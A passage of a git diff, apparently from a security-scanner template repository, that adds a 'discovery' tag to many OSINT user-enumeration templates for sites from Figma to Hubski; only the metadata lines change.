index c2c551a7c78..9b825fa30fb 100644 --- a/http/osint/user-enumeration/federatedpress-mastodon-instance.yaml +++ b/http/osint/user-enumeration/federatedpress-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,federatedpress-mastodon-instance + tags: osint,osint-social,federatedpress-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/figma.yaml b/http/osint/user-enumeration/figma.yaml index f36f33285f0..238cc2f4d32 100644 --- a/http/osint/user-enumeration/figma.yaml +++ b/http/osint/user-enumeration/figma.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,figma + tags: osint,osint-tech,figma,discovery self-contained: true diff --git a/http/osint/user-enumeration/filmweb.yaml b/http/osint/user-enumeration/filmweb.yaml index c459c5a38f6..b87a5738785 100644 --- a/http/osint/user-enumeration/filmweb.yaml +++ b/http/osint/user-enumeration/filmweb.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,filmweb + tags: osint,osint-hobby,filmweb,discovery self-contained: true diff --git a/http/osint/user-enumeration/fine-art-america.yaml b/http/osint/user-enumeration/fine-art-america.yaml index 526c94194c5..2998c444c13 100644 --- a/http/osint/user-enumeration/fine-art-america.yaml +++ b/http/osint/user-enumeration/fine-art-america.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,fine-art-america + tags: osint,osint-shopping,fine-art-america,discovery self-contained: true diff --git a/http/osint/user-enumeration/fiverr.yaml b/http/osint/user-enumeration/fiverr.yaml index 1f2f7b93f3c..3a7ab47b9da 100644 --- a/http/osint/user-enumeration/fiverr.yaml +++ b/http/osint/user-enumeration/fiverr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,fiverr + tags: osint,osint-shopping,fiverr,discovery self-contained: true diff --git a/http/osint/user-enumeration/flickr.yaml b/http/osint/user-enumeration/flickr.yaml index 4fc6cfe2287..882f42885db 100644 --- a/http/osint/user-enumeration/flickr.yaml +++ b/http/osint/user-enumeration/flickr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,flickr + tags: osint,osint-images,flickr,discovery self-contained: true diff --git a/http/osint/user-enumeration/flightradar24.yaml b/http/osint/user-enumeration/flightradar24.yaml index 137cc17d8b2..bec66d7ebd6 100644 --- a/http/osint/user-enumeration/flightradar24.yaml +++ b/http/osint/user-enumeration/flightradar24.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-social + tags: osint,osint-social,discovery self-contained: true diff --git a/http/osint/user-enumeration/flipboard.yaml b/http/osint/user-enumeration/flipboard.yaml index dab55d7e94e..eec786d44e2 100644 --- a/http/osint/user-enumeration/flipboard.yaml +++ b/http/osint/user-enumeration/flipboard.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,flipboard + tags: osint,osint-tech,flipboard,discovery self-contained: true diff --git a/http/osint/user-enumeration/flowcode.yaml b/http/osint/user-enumeration/flowcode.yaml index 438b65e2dcf..5626b8d8ce7 100644 --- a/http/osint/user-enumeration/flowcode.yaml +++ b/http/osint/user-enumeration/flowcode.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,flowcode + tags: osint,osint-social,flowcode,discovery self-contained: true diff --git a/http/osint/user-enumeration/fodors-forum.yaml b/http/osint/user-enumeration/fodors-forum.yaml index d122ff63fc8..c7b99e118fa 100644 --- a/http/osint/user-enumeration/fodors-forum.yaml +++ b/http/osint/user-enumeration/fodors-forum.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,fodors-forum + tags: osint,osint-social,fodors-forum,discovery self-contained: true diff --git a/http/osint/user-enumeration/fortnite-tracker.yaml b/http/osint/user-enumeration/fortnite-tracker.yaml index 1a96cb09de0..25f55ef1456 100644 --- a/http/osint/user-enumeration/fortnite-tracker.yaml +++ b/http/osint/user-enumeration/fortnite-tracker.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,fortnite-tracker + tags: osint,osint-gaming,fortnite-tracker,discovery self-contained: true diff --git a/http/osint/user-enumeration/forumprawneorg.yaml b/http/osint/user-enumeration/forumprawneorg.yaml index 33300eabcc7..a529486ed45 100644 --- a/http/osint/user-enumeration/forumprawneorg.yaml +++ b/http/osint/user-enumeration/forumprawneorg.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,forumprawneorg + tags: osint,osint-misc,forumprawneorg,discovery self-contained: true diff --git a/http/osint/user-enumeration/fosstodonorg-mastodon-instance.yaml b/http/osint/user-enumeration/fosstodonorg-mastodon-instance.yaml index 27c35f9e325..9db5a845117 100644 --- a/http/osint/user-enumeration/fosstodonorg-mastodon-instance.yaml +++ b/http/osint/user-enumeration/fosstodonorg-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,fosstodonorg-mastodon-instance + tags: osint,osint-social,fosstodonorg-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/fotka.yaml b/http/osint/user-enumeration/fotka.yaml index 16258a96a9e..f92fe998b44 100644 --- a/http/osint/user-enumeration/fotka.yaml +++ b/http/osint/user-enumeration/fotka.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,fotka + tags: osint,osint-social,fotka,discovery self-contained: true diff --git a/http/osint/user-enumeration/foursquare.yaml b/http/osint/user-enumeration/foursquare.yaml index 810d2e69735..98b82c5bd15 100644 --- a/http/osint/user-enumeration/foursquare.yaml +++ b/http/osint/user-enumeration/foursquare.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,foursquare + tags: osint,osint-social,foursquare,discovery self-contained: true diff --git a/http/osint/user-enumeration/freelancer.yaml b/http/osint/user-enumeration/freelancer.yaml index 807f3c91e32..ed114c31e17 100644 --- a/http/osint/user-enumeration/freelancer.yaml +++ b/http/osint/user-enumeration/freelancer.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,freelancer + tags: osint,osint-business,freelancer,discovery self-contained: true diff --git a/http/osint/user-enumeration/freesound.yaml b/http/osint/user-enumeration/freesound.yaml index 4a2a82ec294..86c4eeb5d3a 100644 --- a/http/osint/user-enumeration/freesound.yaml +++ b/http/osint/user-enumeration/freesound.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,freesound + tags: osint,osint-music,freesound,discovery self-contained: true diff --git a/http/osint/user-enumeration/friendfinder-x.yaml b/http/osint/user-enumeration/friendfinder-x.yaml index c54fe314986..c4a999a1755 100644 --- a/http/osint/user-enumeration/friendfinder-x.yaml +++ b/http/osint/user-enumeration/friendfinder-x.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,friendfinder-x + tags: osint,osint-dating,friendfinder-x,discovery self-contained: true diff --git a/http/osint/user-enumeration/friendfinder.yaml b/http/osint/user-enumeration/friendfinder.yaml index 71971acfc81..f036ead0a26 100644 --- a/http/osint/user-enumeration/friendfinder.yaml +++ b/http/osint/user-enumeration/friendfinder.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,friendfinder + tags: osint,osint-dating,friendfinder,discovery self-contained: true diff --git a/http/osint/user-enumeration/friendweb.yaml b/http/osint/user-enumeration/friendweb.yaml index 6d12fff11b0..d1f6e51b7ac 100644 --- a/http/osint/user-enumeration/friendweb.yaml +++ b/http/osint/user-enumeration/friendweb.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,friendweb + tags: osint,osint-social,friendweb,discovery self-contained: true diff --git a/http/osint/user-enumeration/furaffinity.yaml b/http/osint/user-enumeration/furaffinity.yaml index 1f4ac61f7da..21a090b1846 100644 --- a/http/osint/user-enumeration/furaffinity.yaml +++ b/http/osint/user-enumeration/furaffinity.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,furaffinity + tags: osint,osint-images,furaffinity,discovery self-contained: true diff --git a/http/osint/user-enumeration/furiffic.yaml b/http/osint/user-enumeration/furiffic.yaml index 8ec9aa7fdb2..6747cce6d0f 100644 --- a/http/osint/user-enumeration/furiffic.yaml +++ b/http/osint/user-enumeration/furiffic.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,furiffic + tags: osint,osint-porn,furiffic,discovery self-contained: true diff --git a/http/osint/user-enumeration/gab.yaml b/http/osint/user-enumeration/gab.yaml index e5137eb57ad..d236296ceb8 100644 --- a/http/osint/user-enumeration/gab.yaml +++ b/http/osint/user-enumeration/gab.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,gab + tags: osint,osint-political,gab,discovery self-contained: true diff --git a/http/osint/user-enumeration/game-debate.yaml b/http/osint/user-enumeration/game-debate.yaml index b13e7aa3f14..88f52e91357 100644 --- a/http/osint/user-enumeration/game-debate.yaml +++ b/http/osint/user-enumeration/game-debate.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,game-debate + tags: osint,osint-gaming,game-debate,discovery self-contained: true diff --git a/http/osint/user-enumeration/gamespot.yaml b/http/osint/user-enumeration/gamespot.yaml index e1a6d45b94d..b660bfed003 100644 --- a/http/osint/user-enumeration/gamespot.yaml +++ b/http/osint/user-enumeration/gamespot.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,gamespot + tags: osint,osint-gaming,gamespot,discovery self-contained: true diff --git a/http/osint/user-enumeration/garmin-connect.yaml b/http/osint/user-enumeration/garmin-connect.yaml index 27fa6eef512..bedd4fbcb8a 100644 --- a/http/osint/user-enumeration/garmin-connect.yaml +++ b/http/osint/user-enumeration/garmin-connect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,garmin-connect + tags: osint,osint-health,garmin-connect,discovery self-contained: true diff --git a/http/osint/user-enumeration/geeksforgeeks.yaml b/http/osint/user-enumeration/geeksforgeeks.yaml index e7a11b9d115..5baafba19be 100644 --- a/http/osint/user-enumeration/geeksforgeeks.yaml +++ b/http/osint/user-enumeration/geeksforgeeks.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-coding,geeksforgeeks + tags: osint,osint-coding,geeksforgeeks,discovery self-contained: true diff --git a/http/osint/user-enumeration/genius-users.yaml b/http/osint/user-enumeration/genius-users.yaml index 1f6c69181d4..ff8366eb424 100644 --- a/http/osint/user-enumeration/genius-users.yaml +++ b/http/osint/user-enumeration/genius-users.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,genius + tags: osint,osint-social,genius,discovery self-contained: true diff --git a/http/osint/user-enumeration/geocaching.yaml b/http/osint/user-enumeration/geocaching.yaml index 44eb131748f..641c72314ea 100644 --- a/http/osint/user-enumeration/geocaching.yaml +++ b/http/osint/user-enumeration/geocaching.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,geocaching + tags: osint,osint-social,geocaching,discovery self-contained: true diff --git a/http/osint/user-enumeration/getmonero.yaml b/http/osint/user-enumeration/getmonero.yaml index 898573dc506..e9da5380898 100644 --- a/http/osint/user-enumeration/getmonero.yaml +++ b/http/osint/user-enumeration/getmonero.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,getmonero + tags: osint,osint-misc,getmonero,discovery self-contained: true diff --git a/http/osint/user-enumeration/gettr.yaml b/http/osint/user-enumeration/gettr.yaml index fa537f87418..982dec37ba3 100644 --- a/http/osint/user-enumeration/gettr.yaml +++ b/http/osint/user-enumeration/gettr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,gettr + tags: osint,osint-social,gettr,discovery self-contained: true diff --git a/http/osint/user-enumeration/gfycat.yaml b/http/osint/user-enumeration/gfycat.yaml index 2e929c5cd83..34bf6d9f234 100644 --- a/http/osint/user-enumeration/gfycat.yaml +++ b/http/osint/user-enumeration/gfycat.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,gfycat + tags: osint,osint-misc,gfycat,discovery self-contained: true diff --git a/http/osint/user-enumeration/giant-bomb.yaml b/http/osint/user-enumeration/giant-bomb.yaml index cbb4d2e976a..f6114e56b9c 100644 --- a/http/osint/user-enumeration/giant-bomb.yaml +++ b/http/osint/user-enumeration/giant-bomb.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-gaming,giant-bomb + tags: osint,osint-gaming,giant-bomb,discovery self-contained: true diff --git a/http/osint/user-enumeration/gigapan.yaml b/http/osint/user-enumeration/gigapan.yaml index 7e580272f69..ff141ed5617 100644 --- a/http/osint/user-enumeration/gigapan.yaml +++ b/http/osint/user-enumeration/gigapan.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,gigapan + tags: osint,osint-hobby,gigapan,discovery self-contained: true diff --git a/http/osint/user-enumeration/giphy.yaml b/http/osint/user-enumeration/giphy.yaml index f8c8a15136a..b7c974d52f1 100644 --- a/http/osint/user-enumeration/giphy.yaml +++ b/http/osint/user-enumeration/giphy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,giphy + tags: osint,osint-social,giphy,discovery self-contained: true diff --git a/http/osint/user-enumeration/girlfriendsmeet.yaml b/http/osint/user-enumeration/girlfriendsmeet.yaml index d3e8ecc49dc..865bff2b4aa 100644 --- a/http/osint/user-enumeration/girlfriendsmeet.yaml +++ b/http/osint/user-enumeration/girlfriendsmeet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,girlfriendsmeet + tags: osint,osint-dating,girlfriendsmeet,discovery self-contained: true diff --git a/http/osint/user-enumeration/gist.yaml b/http/osint/user-enumeration/gist.yaml index ad5cb92fad6..c06f9d13342 100644 --- a/http/osint/user-enumeration/gist.yaml +++ b/http/osint/user-enumeration/gist.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-coding,gist,github + tags: osint,osint-coding,gist,github,discovery self-contained: true diff --git a/http/osint/user-enumeration/gitea.yaml b/http/osint/user-enumeration/gitea.yaml index 4662fcc1937..9e93d0e76c5 100644 --- a/http/osint/user-enumeration/gitea.yaml +++ b/http/osint/user-enumeration/gitea.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,gitea + tags: osint,osint-coding,gitea,discovery self-contained: true diff --git a/http/osint/user-enumeration/gitee.yaml b/http/osint/user-enumeration/gitee.yaml index 491660a956a..adc30c12c75 100644 --- a/http/osint/user-enumeration/gitee.yaml +++ b/http/osint/user-enumeration/gitee.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,gitee + tags: osint,osint-coding,gitee,discovery self-contained: true diff --git a/http/osint/user-enumeration/giters.yaml b/http/osint/user-enumeration/giters.yaml index d271a4a8cfa..93efb70c0bf 100644 --- a/http/osint/user-enumeration/giters.yaml +++ b/http/osint/user-enumeration/giters.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,giters + tags: osint,osint-coding,giters,discovery self-contained: true diff --git a/http/osint/user-enumeration/github.yaml b/http/osint/user-enumeration/github.yaml index a78486c9b67..52439793b37 100644 --- a/http/osint/user-enumeration/github.yaml +++ b/http/osint/user-enumeration/github.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,github + tags: osint,osint-coding,github,discovery self-contained: true diff --git a/http/osint/user-enumeration/gitlab.yaml b/http/osint/user-enumeration/gitlab.yaml index d3dfbe014bc..9a350d94b72 100644 --- a/http/osint/user-enumeration/gitlab.yaml +++ b/http/osint/user-enumeration/gitlab.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,gitlab + tags: osint,osint-coding,gitlab,discovery self-contained: true diff --git a/http/osint/user-enumeration/gloriatv.yaml b/http/osint/user-enumeration/gloriatv.yaml index 266fb536c99..7c00bb05b67 100644 --- a/http/osint/user-enumeration/gloriatv.yaml +++ b/http/osint/user-enumeration/gloriatv.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,gloriatv + tags: osint,osint-social,gloriatv,discovery self-contained: true diff --git a/http/osint/user-enumeration/gnome-extensions.yaml b/http/osint/user-enumeration/gnome-extensions.yaml index 64caf32829a..f5ad5ded66a 100644 --- a/http/osint/user-enumeration/gnome-extensions.yaml +++ b/http/osint/user-enumeration/gnome-extensions.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,gnome-extensions + tags: osint,osint-coding,gnome-extensions,discovery self-contained: true diff --git a/http/osint/user-enumeration/gpoddernet.yaml b/http/osint/user-enumeration/gpoddernet.yaml index 66272adb912..de73e409186 100644 --- a/http/osint/user-enumeration/gpoddernet.yaml +++ b/http/osint/user-enumeration/gpoddernet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,gpoddernet + tags: osint,osint-music,gpoddernet,discovery self-contained: true diff --git a/http/osint/user-enumeration/grandprof.yaml b/http/osint/user-enumeration/grandprof.yaml index d0c5d21c347..2f3b901abbb 100644 --- a/http/osint/user-enumeration/grandprof.yaml +++ b/http/osint/user-enumeration/grandprof.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,grandprof + tags: osint,osint-misc,grandprof,discovery self-contained: true diff --git a/http/osint/user-enumeration/graphicssocial-mastodon-instance.yaml b/http/osint/user-enumeration/graphicssocial-mastodon-instance.yaml index 7f08f2512be..afebc2143f6 100644 --- a/http/osint/user-enumeration/graphicssocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/graphicssocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,graphicssocial-mastodon-instance + tags: osint,osint-social,graphicssocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/gravatar.yaml b/http/osint/user-enumeration/gravatar.yaml index b230f6509aa..0c3914f6a15 100644 --- a/http/osint/user-enumeration/gravatar.yaml +++ b/http/osint/user-enumeration/gravatar.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,gravatar + tags: osint,osint-images,gravatar,discovery self-contained: true diff --git a/http/osint/user-enumeration/gumroad.yaml b/http/osint/user-enumeration/gumroad.yaml index a691b804c6b..5090358910d 100644 --- a/http/osint/user-enumeration/gumroad.yaml +++ b/http/osint/user-enumeration/gumroad.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,gumroad + tags: osint,osint-shopping,gumroad,discovery self-contained: true diff --git a/http/osint/user-enumeration/hackaday.yaml b/http/osint/user-enumeration/hackaday.yaml index b5aaceeb0e4..f0bdec39913 100644 --- a/http/osint/user-enumeration/hackaday.yaml +++ b/http/osint/user-enumeration/hackaday.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,hackaday + tags: osint,osint-hobby,hackaday,discovery self-contained: true diff --git a/http/osint/user-enumeration/hackenproof.yaml b/http/osint/user-enumeration/hackenproof.yaml index c2b99cbb220..c430cb5725c 100644 --- a/http/osint/user-enumeration/hackenproof.yaml +++ b/http/osint/user-enumeration/hackenproof.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,hackenproof + tags: osint,osint-tech,hackenproof,discovery self-contained: true diff --git a/http/osint/user-enumeration/hacker-news.yaml b/http/osint/user-enumeration/hacker-news.yaml index e8fcc7b3151..064fb003f03 100644 --- a/http/osint/user-enumeration/hacker-news.yaml +++ b/http/osint/user-enumeration/hacker-news.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,hacker-news + tags: osint,osint-tech,hacker-news,discovery self-contained: true diff --git a/http/osint/user-enumeration/hackerearth.yaml b/http/osint/user-enumeration/hackerearth.yaml index 1c3e28137fc..68cbbb70e9b 100644 --- a/http/osint/user-enumeration/hackerearth.yaml +++ b/http/osint/user-enumeration/hackerearth.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,hackerearth + tags: osint,osint-coding,hackerearth,discovery self-contained: true diff --git a/http/osint/user-enumeration/hackernoon.yaml b/http/osint/user-enumeration/hackernoon.yaml index 2e2bebc313c..2e90b09c76c 100644 --- a/http/osint/user-enumeration/hackernoon.yaml +++ b/http/osint/user-enumeration/hackernoon.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,hackernoon + tags: osint,osint-tech,hackernoon,discovery self-contained: true diff --git a/http/osint/user-enumeration/hackerone.yaml b/http/osint/user-enumeration/hackerone.yaml index 68172af7668..3cba864dd97 100644 --- a/http/osint/user-enumeration/hackerone.yaml +++ b/http/osint/user-enumeration/hackerone.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,hackerone + tags: osint,osint-tech,hackerone,discovery self-contained: true diff --git a/http/osint/user-enumeration/hackerrank.yaml b/http/osint/user-enumeration/hackerrank.yaml index a3816838322..33387ef143b 100644 --- a/http/osint/user-enumeration/hackerrank.yaml +++ b/http/osint/user-enumeration/hackerrank.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,hackerrank + tags: osint,osint-tech,hackerrank,discovery self-contained: true diff --git a/http/osint/user-enumeration/hackster.yaml b/http/osint/user-enumeration/hackster.yaml index aa92fc6d92d..864fe8a79a9 100644 --- a/http/osint/user-enumeration/hackster.yaml +++ b/http/osint/user-enumeration/hackster.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,hackster + tags: osint,osint-coding,hackster,discovery self-contained: true diff --git a/http/osint/user-enumeration/hamaha.yaml b/http/osint/user-enumeration/hamaha.yaml index dc6d60f44c6..ece9331453d 100644 --- a/http/osint/user-enumeration/hamaha.yaml +++ b/http/osint/user-enumeration/hamaha.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,hamaha + tags: osint,osint-finance,hamaha,discovery self-contained: true diff --git a/http/osint/user-enumeration/hanime.yaml b/http/osint/user-enumeration/hanime.yaml index dede68b49b1..f2f18078149 100644 --- a/http/osint/user-enumeration/hanime.yaml +++ b/http/osint/user-enumeration/hanime.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,hanime + tags: osint,osint-porn,hanime,discovery self-contained: true diff --git a/http/osint/user-enumeration/hashnode.yaml b/http/osint/user-enumeration/hashnode.yaml index 75176660fc0..17dc9510c0b 100644 --- a/http/osint/user-enumeration/hashnode.yaml +++ b/http/osint/user-enumeration/hashnode.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,hashnode + tags: osint,osint-social,hashnode,discovery self-contained: true diff --git a/http/osint/user-enumeration/hcommonssocial-mastodon-instance.yaml b/http/osint/user-enumeration/hcommonssocial-mastodon-instance.yaml index 0c6148bdb80..e71281bd96f 100644 --- a/http/osint/user-enumeration/hcommonssocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/hcommonssocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,hcommonssocial-mastodon-instance + tags: osint,osint-social,hcommonssocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/heylink.yaml b/http/osint/user-enumeration/heylink.yaml index 6ba04dcc713..956bdfd2acf 100644 --- a/http/osint/user-enumeration/heylink.yaml +++ b/http/osint/user-enumeration/heylink.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,heylink + tags: osint,osint-misc,heylink,discovery self-contained: true diff --git a/http/osint/user-enumeration/hiberworld.yaml b/http/osint/user-enumeration/hiberworld.yaml index fbc00c2e8b7..ba4fd0686f9 100644 --- a/http/osint/user-enumeration/hiberworld.yaml +++ b/http/osint/user-enumeration/hiberworld.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,hiberworld + tags: osint,osint-gaming,hiberworld,discovery self-contained: true diff --git a/http/osint/user-enumeration/hihello.yaml b/http/osint/user-enumeration/hihello.yaml index d088c85429b..9f030e073d5 100644 --- a/http/osint/user-enumeration/hihello.yaml +++ b/http/osint/user-enumeration/hihello.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,hihello + tags: osint,osint-business,hihello,discovery self-contained: true diff --git a/http/osint/user-enumeration/historianssocial-mastodon-instance.yaml b/http/osint/user-enumeration/historianssocial-mastodon-instance.yaml index 60c4b74181d..ec821645690 100644 --- a/http/osint/user-enumeration/historianssocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/historianssocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,historianssocial-mastodon-instance + tags: osint,osint-social,historianssocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/homedesign3d.yaml b/http/osint/user-enumeration/homedesign3d.yaml index 8d3197716c5..d1361b5d05c 100644 --- a/http/osint/user-enumeration/homedesign3d.yaml +++ b/http/osint/user-enumeration/homedesign3d.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,homedesign3d + tags: osint,osint-hobby,homedesign3d,discovery self-contained: true diff --git a/http/osint/user-enumeration/hometechsocial-mastodon-instance.yaml b/http/osint/user-enumeration/hometechsocial-mastodon-instance.yaml index cb583df10d7..fbfda4d6788 100644 --- a/http/osint/user-enumeration/hometechsocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/hometechsocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,hometechsocial-mastodon-instance + tags: osint,osint-social,hometechsocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/hoobe.yaml b/http/osint/user-enumeration/hoobe.yaml index a52f269b40a..3a5d53621be 100644 --- a/http/osint/user-enumeration/hoobe.yaml +++ b/http/osint/user-enumeration/hoobe.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,hoobe + tags: osint,osint-business,hoobe,discovery self-contained: true diff --git a/http/osint/user-enumeration/hostuxsocial-mastodon-instance.yaml b/http/osint/user-enumeration/hostuxsocial-mastodon-instance.yaml index aebe5317862..6a7475a87f7 100644 --- a/http/osint/user-enumeration/hostuxsocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/hostuxsocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,hostuxsocial-mastodon-instance + tags: osint,osint-social,hostuxsocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/houzz.yaml b/http/osint/user-enumeration/houzz.yaml index 4babedf6440..01c74f3def6 100644 --- a/http/osint/user-enumeration/houzz.yaml +++ b/http/osint/user-enumeration/houzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,houzz + tags: osint,osint-hobby,houzz,discovery self-contained: true diff --git a/http/osint/user-enumeration/hubpages.yaml b/http/osint/user-enumeration/hubpages.yaml index 6e91561112c..a81129c5ab8 100644 --- a/http/osint/user-enumeration/hubpages.yaml +++ b/http/osint/user-enumeration/hubpages.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,hubpages + tags: osint,osint-blog,hubpages,discovery self-contained: true diff --git a/http/osint/user-enumeration/hubski.yaml b/http/osint/user-enumeration/hubski.yaml index 9118e80baf5..bcfc5845056 100644 --- a/http/osint/user-enumeration/hubski.yaml +++ b/http/osint/user-enumeration/hubski.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: 